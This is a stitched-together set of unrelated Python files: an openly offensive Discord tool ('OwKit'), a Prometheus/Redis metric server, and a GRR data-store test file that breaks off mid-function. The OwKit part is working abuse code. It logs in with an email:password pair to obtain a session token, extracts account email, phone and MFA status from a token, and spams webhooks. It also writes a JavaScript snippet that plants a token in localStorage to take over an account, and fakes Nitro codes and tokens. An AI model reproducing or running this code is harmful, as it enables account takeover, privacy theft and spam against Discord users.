if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def tokenvalidator():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Validator')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
print(f'{Fore.GREEN}Token valid{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token.{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def hypesquad():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Hypesquad Changer')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
print(f"""
{Fore.MAGENTA}(1){Fore.RESET} Bravery
{Fore.MAGENTA}(2){Fore.RESET} Brilliance
{Fore.MAGENTA}(3){Fore.RESET} Balance
""")
house = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Your choice: ')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
headers = {
'Authorization': token,
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'
}
if house == "1":
payload = {'house_id': 1}
elif house == "2":
payload = {'house_id': 2}
elif house == "3":
payload = {'house_id': 3}
r = requests.post('https://discordapp.com/api/v6/hypesquad/online', headers=headers, json=payload, timeout=10)
if r.status_code == 204:
print(f"{Fore.GREEN}Successfully changed your token hypesquad{Fore.RESET}")
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def nitrogen():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Nitro Generator')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
try:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount: '))
value = 1
while value <= amount:
code = "https://discord.gift/" + ('').join(random.choices(string.ascii_letters + string.digits, k=16))
f = open(f'Nitro codes ({amount}).txt', "a+")
f.write(f'{code}\n')
f.close()
print(f'{code}')
value += 1
print('')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
except ValueError:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def tokengen():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Generator')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
try:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount: '))
value = 1
while value <= amount:
code = "Nz" + ('').join(random.choices(string.ascii_letters + string.digits, k=59))
f = open(f'Tokens ({amount}).txt', "a+")
f.write(f'{code}\n')
f.close()
print(f'{code}')
value += 1
print('')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
except ValueError:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def trolltoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Troll Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount: '))
modes = cycle(["light", "dark"])
for i in range(amount):
t = threading.Thread(target=trolltoken, args=(i,))
print(f'{Fore.GREEN}Token has been trolled [{i}]')
time.sleep(0.12)
setting = {'theme': next(modes)}
requests.patch("https://discord.com/api/v8/users/@me/settings", headers=headers, json=setting)
print(f'{Fore.GREEN}Finished trolling{Fore.RESET}')
print('Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
else:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def tokeninfo():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Info')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
print(f'{Fore.GREEN}Token is valid.{Fore.RESET}')
userName = r.json()['username'] + '#' + r.json()['discriminator']
userID = r.json()['id']
phone = r.json()['phone']
email = r.json()['email']
mfa = r.json()['mfa_enabled']
verified = r.json()['verified']
print(f'''
User: {userName}
ID: {userID}
Phone: {phone}
Email: {email}
MFA: {mfa}
Verified: {verified}
Token: {token}
''')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
def informations():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Informations & contact')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
fh = open('Information & contact.txt', 'w', encoding='utf-8')
fh.write("""
Discord User: Monster CAT
Github: https://github.com/H23ninezerozerozero
""")
fh.close()
print(f"""
Discord User: Monster CAT
Github: https://github.com/H23ninezerozerozero
""")
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def tokenfetcher():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Get token from email:password')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
email = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Email: ')
password = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Password: ')
data={'email': email, 'password': password, 'undelete': "false"}
headers={'content-type': "application/json", 'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"}
r = requests.post('https://discord.com/api/v8/auth/login', json=data, headers=headers)
if r.status_code == 200:
token = r.json()['token']
print(f'Token: {token}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
elif "PASSWORD_DOES_NOT_MATCH" in r.text:
print(f'{Fore.RED}Invalid Password{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
elif "captcha-required" in r.text:
print(f'{Fore.RED}Discord returned captcha{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
if keyboard.is_pressed('enter'):
mainMenu()
os.system('cls')
else:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def checkwebhook():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Check Webhook')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
webhook = input(f'\n\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}Webhook: ')
message = ('_ _')
try:
_data = requests.post(webhook, json={'content': message}, headers={'Content-Type': 'application/json'})
if _data.status_code < 400:
print(f'\n{Fore.GREEN}Webhook valid{Fore.RESET}')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
except:
print(f'\n\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}Invalid Webhook')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def spamwebhook():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Spam Webhook')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
webhook = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Webhook: ')
message = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Message: ')
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Amount:'))
try:
for i in range(amount):
_data = requests.post(webhook, json={'content': message}, headers={'Content-Type': 'application/json'})
if _data.status_code < 400:
print(f'Sent new message [{i}]')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
except:
print(f'\n\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}Invalid Webhook\n')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def tokenlogin():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Informations')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
fh = open('Token Login Script.txt', 'w', encoding='utf-8')
fh.write('''
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}'''
+ login('{token}'))
fh.close()
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
else:
print(f"{Fore.RED}Invalid token{Fore.RESET}")
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
def getBanner():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Main Menu')
banner = f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
\u001b[38;5;141m[\u001b[38;5;141m1\u001b[38;5;141m] \u001b[38;5;15mGet token from email:password \u001b[38;5;141m[\u001b[38;5;141m9\u001b[38;5;141m] \u001b[38;5;15mChange Hypesquad house
\u001b[38;5;141m[\u001b[38;5;141m2\u001b[38;5;141m] \u001b[38;5;15mNuke token \u001b[38;5;141m[\u001b[38;5;141m10\u001b[38;5;141m] \u001b[38;5;15mToken validator
\u001b[38;5;141m[\u001b[38;5;141m3\u001b[38;5;141m] \u001b[38;5;15mBan token \u001b[38;5;141m[\u001b[38;5;141m11\u001b[38;5;141m] \u001b[38;5;15mSpam webhook
\u001b[38;5;141m[\u001b[38;5;141m4\u001b[38;5;141m] \u001b[38;5;15mTroll token \u001b[38;5;141m[\u001b[38;5;141m12\u001b[38;5;141m] \u001b[38;5;15mCheck webhook
\u001b[38;5;141m[\u001b[38;5;141m5\u001b[38;5;141m] \u001b[38;5;15mToken informations \u001b[38;5;141m[\u001b[38;5;141m13\u001b[38;5;141m] \u001b[38;5;15mGenerate nitro codes
\u001b[38;5;141m[\u001b[38;5;141m6\u001b[38;5;141m] \u001b[38;5;15mGet token from user id \u001b[38;5;141m[\u001b[38;5;141m14\u001b[38;5;141m] \u001b[38;5;15mGenerate tokens
\u001b[38;5;141m[\u001b[38;5;141m7\u001b[38;5;141m] \u001b[38;5;15mLogin on token \u001b[38;5;141m[\u001b[38;5;141m15\u001b[38;5;141m] \u001b[38;5;15mInformations & contact
\u001b[38;5;141m[\u001b[38;5;141m8\u001b[38;5;141m] \u001b[38;5;15mUnverify token \u001b[38;5;141m[\u001b[38;5;141m0\u001b[38;5;141m] \u001b[38;5;15mExit
'''
return banner
def mainMenu():
print(getBanner())
print(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET}', end=''); choice = str(input(' '))
if choice == '1':
tokenfetcher()
elif choice == '2':
nuketoken()
elif choice == '3':
bantoken()
elif choice == '4':
trolltoken()
elif choice == '5':
tokeninfo()
elif choice == '6':
tokenfromuserid()
elif choice == '7':
tokenlogin()
elif choice == '8':
unverifytoken()
elif choice == '9':
hypesquad()
elif choice == '10':
tokenvalidator()
elif choice == '11':
spamwebhook()
elif choice == '12':
checkwebhook()
elif choice == '13':
nitrogen()
elif choice == '14':
tokengen()
elif choice == '0':
exit()
elif choice.isdigit() == False:
mainMenu()
else:
mainMenu()
if __name__ == '__main__':
mainMenu()
|
server.py
|
from prometheus_client import start_http_server, Gauge, Counter, Histogram, Summary
import redis
import json
import logging
import sys
from subprocess32 import call
import psutil
from schema import validate_schema, Prom_Type
from jsonschema import ValidationError
from config import CHANNEL_NAME, DEFAULT_BUCKETS, UNIX_SOCKET_PATH
class Metric:
"""
    The Metric class abstracts away the complexity of dealing with Prometheus
    data types.
"""
def __init__(self, name, metric_type, description, buckets):
self.name = name
self.type = metric_type
if metric_type == 'Counter':
self._metric = Counter(name, description)
elif metric_type == 'Gauge':
self._metric = Gauge(name, description)
elif metric_type == 'Histogram':
self._metric = Histogram(name, description, buckets=buckets)
elif metric_type == 'Summary':
self._metric = Summary(name, description)
def report(self, value):
value = float(value)
if self.type == 'Counter':
self._metric.inc(value)
elif self.type == 'Gauge':
self._metric.set(value)
        elif self.type in ('Histogram', 'Summary'):
self._metric.observe(value)
def add_metric(name, metric_type, description, buckets, metric_pool):
metric_pool[name] = Metric(name, metric_type, description, buckets)
def report_metric(name, val, metric_pool):
if name in metric_pool:
metric_pool[name].report(val)
else:
logger = logging.getLogger(__name__)
logger.error("{} not found in metric pool: {}".format(
name, metric_pool.keys()))
def handle_message(message_dict, metric_pool):
"""
    Handle a message dictionary and dispatch it to the add or report handler.
"""
endpoint = message_dict['endpoint']
data = message_dict['data']
if endpoint == 'add':
add_metric(data['name'], data['type'], data['description'],
data.get('buckets', DEFAULT_BUCKETS), metric_pool)
elif endpoint == 'report':
report_metric(data['name'], data['data'], metric_pool)
def start_server():
logger = _init_logger()
start_http_server(1390)
logger.info("Metric Server Started!")
r = redis.Redis(unix_socket_path=UNIX_SOCKET_PATH)
sub = r.pubsub(ignore_subscribe_messages=True)
sub.subscribe(CHANNEL_NAME)
logger.info("Redis Connected! Waiting for messages...")
metric_pool = {}
for message in sub.listen(): # Blocking, will run forever
logger.debug(message)
try:
message_dict = json.loads(message['data'])
validate_schema(message_dict)
handle_message(message_dict, metric_pool)
except (KeyError, ValueError, ValidationError) as e:
            # Here, we catch errors in
            # (1) message['data']: the redis queue is not sending messages
            #     in the expected format.
            # (2) json.loads: the json string is corrupted.
            # (3) validate_schema, which raises ValidationError if schema
            #     validation fails.
            #
            # Note:
            # (2) raises ValueError in Python 2 and json.JSONDecodeError
            #     (a ValueError subclass) in Python 3.
logger.error(e)
def _init_logger():
logging.basicConfig(
filename='/metric_server.log',
format=
'%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
logger = logging.getLogger(__name__)
return logger
def start_redis_daemon():
cmd = [
'redis-server', '--unixsocket', '/tmp/redis.sock', '--daemonize', 'yes'
]
call(cmd)
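    # Note: the '/tmp/redis.sock' path above is hardcoded; it has to match the
    # UNIX_SOCKET_PATH that start_server() passes to redis.Redis(), otherwise
    # the server will not reach the daemon it just started.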
def redis_daemon_exist():
    # We can just check for a 'redis-server' process because, in the default
    # situation, we are running in a container with no other processes that
    # could be confused with it.
pids = psutil.pids()
process_names = [psutil.Process(pid).name() for pid in pids]
return 'redis-server' in process_names
if __name__ == '__main__':
start_redis_daemon()
    # This snippet of code spins up a debug server that serves the log
    # on port 1392. Don't forget to add the debug line to the container
    # manager as well!
if len(sys.argv) > 1 and sys.argv[-1] == 'DEBUG':
def start_debug_server():
from flask import Flask, send_file, jsonify
app = Flask(__name__)
@app.route('/')
def show_log():
return send_file('/metric_server.log')
app.run(host='0.0.0.0', port=1392)
from multiprocessing import Process
debug_proc = Process(target=start_debug_server)
debug_proc.start()
start_server()
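# Example client usage (a sketch, not part of this server; the metric name
# below is made up): a producer registers a metric once and then reports
# values by publishing JSON on CHANNEL_NAME over the same unix socket, e.g.:
#
#   import json, redis
#   from config import CHANNEL_NAME, UNIX_SOCKET_PATH
#
#   client = redis.Redis(unix_socket_path=UNIX_SOCKET_PATH)
#   client.publish(CHANNEL_NAME, json.dumps(
#       {'endpoint': 'add',
#        'data': {'name': 'request_latency_ms', 'type': 'Histogram',
#                 'description': 'Example request latency metric'}}))
#   client.publish(CHANNEL_NAME, json.dumps(
#       {'endpoint': 'report',
#        'data': {'name': 'request_latency_ms', 'data': 12.5}}))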
|
data_store_test.py
|
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""These are basic tests for the data store abstraction.
Implementations should be able to pass these tests to be conformant.
"""
import csv
import functools
import hashlib
import inspect
import logging
import operator
import os
import random
import string
import tempfile
import thread
import threading
import time
import mock
from grr.lib import aff4
from grr.lib import data_store
from grr.lib import flow
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import sequential_collection
from grr.lib import test_lib
from grr.lib import threadpool
from grr.lib import worker
from grr.lib.aff4_objects import aff4_grr
from grr.lib.aff4_objects import standard
from grr.lib.flows.general import filesystem
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class StringSequentialCollection(
sequential_collection.IndexedSequentialCollection):
RDF_TYPE = rdfvalue.RDFString
def DeletionTest(f):
"""This indicates a test that uses deletion."""
@functools.wraps(f)
def Decorator(testinstance):
if testinstance.TEST_DELETION:
return f(testinstance)
else:
return testinstance.skipTest("Tests that use deletion are disabled "
"for this data store.")
return Decorator
def DBSubjectLockTest(f):
"""This indicates a test that uses locks."""
@functools.wraps(f)
def Decorator(testinstance):
if testinstance.TEST_DBSUBJECTLOCKS:
return f(testinstance)
else:
return testinstance.skipTest("Tests that use locks are disabled "
"for this data store.")
return Decorator
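# Concrete data store tests are expected to subclass _DataStoreTest (below),
# roughly as in this hypothetical sketch: override InitDatastore() /
# DestroyDatastore() to stand up and tear down the backend, and turn off the
# TEST_DELETION / TEST_DBSUBJECTLOCKS flags for backends that do not support
# deletion or subject locks.
#
#   class MyDataStoreTest(_DataStoreTest):
#     TEST_DELETION = True
#     TEST_DBSUBJECTLOCKS = False   # e.g. backend has no subject locks
#
#     def InitDatastore(self):
#       ...  # point data_store.DB at the implementation under test
#
#     def DestroyDatastore(self):
#       ...  # clean up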
class _DataStoreTest(test_lib.GRRBaseTest):
"""Test the data store abstraction.
Note that when testing timestamp behavior the cloud bigtable datastore only
has ms precision.
"""
test_row = "aff4:/row:foo"
lease_row = u"aff4:/leasetest"
  # This flag controls whether tests can also delete data. Some data stores
  # don't support deletion, so those tests will fail for them.
TEST_DELETION = True
# The same applies to locks.
TEST_DBSUBJECTLOCKS = True
def _ClearDB(self, subjects):
for subject in subjects:
data_store.DB.DeleteSubject(subject, token=self.token)
data_store.DB.Flush()
def setUp(self):
super(_DataStoreTest, self).setUp()
self.InitDatastore()
to_delete = ["aff4:/row:%s" % i for i in range(20)]
to_delete.extend(["aff4:/C/%s" % i for i in range(7)])
to_delete.extend(
[self.test_row, self.lease_row, "aff4:/A/", "aff4:/B/", "aff4:/C/"])
self._ClearDB(to_delete)
self.acls_installed = False
def tearDown(self):
super(_DataStoreTest, self).tearDown()
self.DestroyDatastore()
def InitDatastore(self):
"""Initiates custom data store."""
def DestroyDatastore(self):
"""Destroys custom data store."""
def _TruncateToMilliseconds(self, timestamp_int):
timestamp_int -= (timestamp_int % 1000)
return timestamp_int
def testSetResolve(self):
"""Test the Set() and Resolve() methods."""
predicate = "task:00000001"
value = rdf_flows.GrrMessage(session_id="session")
    # Ensure that a freshly set value is immediately available.
data_store.DB.Set(self.test_row, predicate, value, token=self.token)
time.sleep(1)
data_store.DB.Set(self.test_row + "X", predicate, value, token=self.token)
stored_proto, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
stored_proto = rdf_flows.GrrMessage.FromSerializedString(stored_proto)
self.assertEqual(stored_proto.session_id, value.session_id)
def testMultiSet(self):
"""Test the MultiSet() methods."""
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row, {
"aff4:size": [1],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
},
token=self.token)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
def testMultiSetTimestamps(self):
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row,
{"aff4:size": [(1, 1000)],
"aff4:stored": [(unicode_string, 2000)]},
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
self.assertEqual(ts, 2000)
def testMultiSetNoneTimestampIsNow(self):
unicode_string = u"this is a uñîcödé string"
start_time = time.time() * 1e6
# Test None timestamp is translated to current time.
data_store.DB.MultiSet(
self.test_row,
{"aff4:size": [(1, None)],
"aff4:stored": [(unicode_string, 2000)]},
token=self.token)
end_time = time.time() * 1e6
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertGreaterEqual(ts, start_time)
self.assertLessEqual(ts, end_time)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
self.assertEqual(ts, 2000)
def testMultiSetAsync(self):
"""Test the async MultiSet() methods."""
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row, {
"aff4:size": [3],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
},
sync=False,
token=self.token)
# Force the flusher thread to flush.
data_store.DB.flusher_thread.target()
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 3)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
def testMultiSet2(self):
"""Test the MultiSet() methods."""
# Specify a per element timestamp
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [(1, 1000)],
"aff4:stored": [("2", 2000)]},
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, "2")
self.assertEqual(ts, 2000)
def testMultiSet3(self):
"""Test the MultiSet() delete methods."""
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [1],
"aff4:stored": ["2"]},
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": ["2"]},
to_delete=["aff4:size"],
token=self.token)
# This should be gone now
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertIsNone(stored)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, "2")
def testMultiSet4(self):
"""Test the MultiSet() delete methods when deleting the same predicate."""
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [1],
"aff4:stored": ["2"]},
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [4]},
to_delete=["aff4:size"],
token=self.token)
# This should only produce a single result
count = 0
for count, (predicate, value, _) in enumerate(
data_store.DB.ResolvePrefix(
self.test_row,
"aff4:size",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)):
self.assertEqual(value, 4)
self.assertEqual(predicate, "aff4:size")
self.assertEqual(count, 0)
  def testMultiSetSetsTimestampWhenReplacing(self):
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [(1, 1000)]},
replace=True,
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
def testMultiSetRemovesOtherValuesWhenReplacing(self):
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": [("2", 1000), ("3", 4000)]},
replace=False,
token=self.token)
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
